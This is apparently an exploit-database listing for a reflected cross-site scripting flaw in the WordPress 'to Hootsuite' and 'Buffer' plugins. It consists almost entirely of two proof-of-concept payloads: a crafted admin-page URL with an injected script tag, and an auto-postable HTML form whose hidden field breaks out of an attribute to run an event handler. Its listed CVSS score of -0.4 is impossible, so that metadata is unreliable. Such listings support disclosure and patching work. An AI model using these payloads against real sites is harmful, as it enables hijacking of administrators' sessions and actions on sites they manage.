Exploit for WordPress to Hootsuite (< 1.3.9) & Buffer (< 3.7.5) - Reflected Cross-Site Scripting

Name: Exploit for WordPress to Hootsuite (< 1.3.9) & Buffer (< 3.7.5) - Reflected Cross-Site Scripting
Rating: 5 (261 reviews)

2021-09-20 | CVSS -0.4

## https://sploitus.com/exploit?id=WPEX-ID:C9298FF7-4C21-4D57-9048-2ED1DC29160B
https://example.com/wp-admin/admin.php?page=wp-to-buffer-log&s=<script>alert(/XSS/)</script>

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=wp-to-buffer-log" method="POST">
      <input type="hidden" name="page" value='" style=animation-name:rotation onanimationstart=alert(/XSS/)//' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>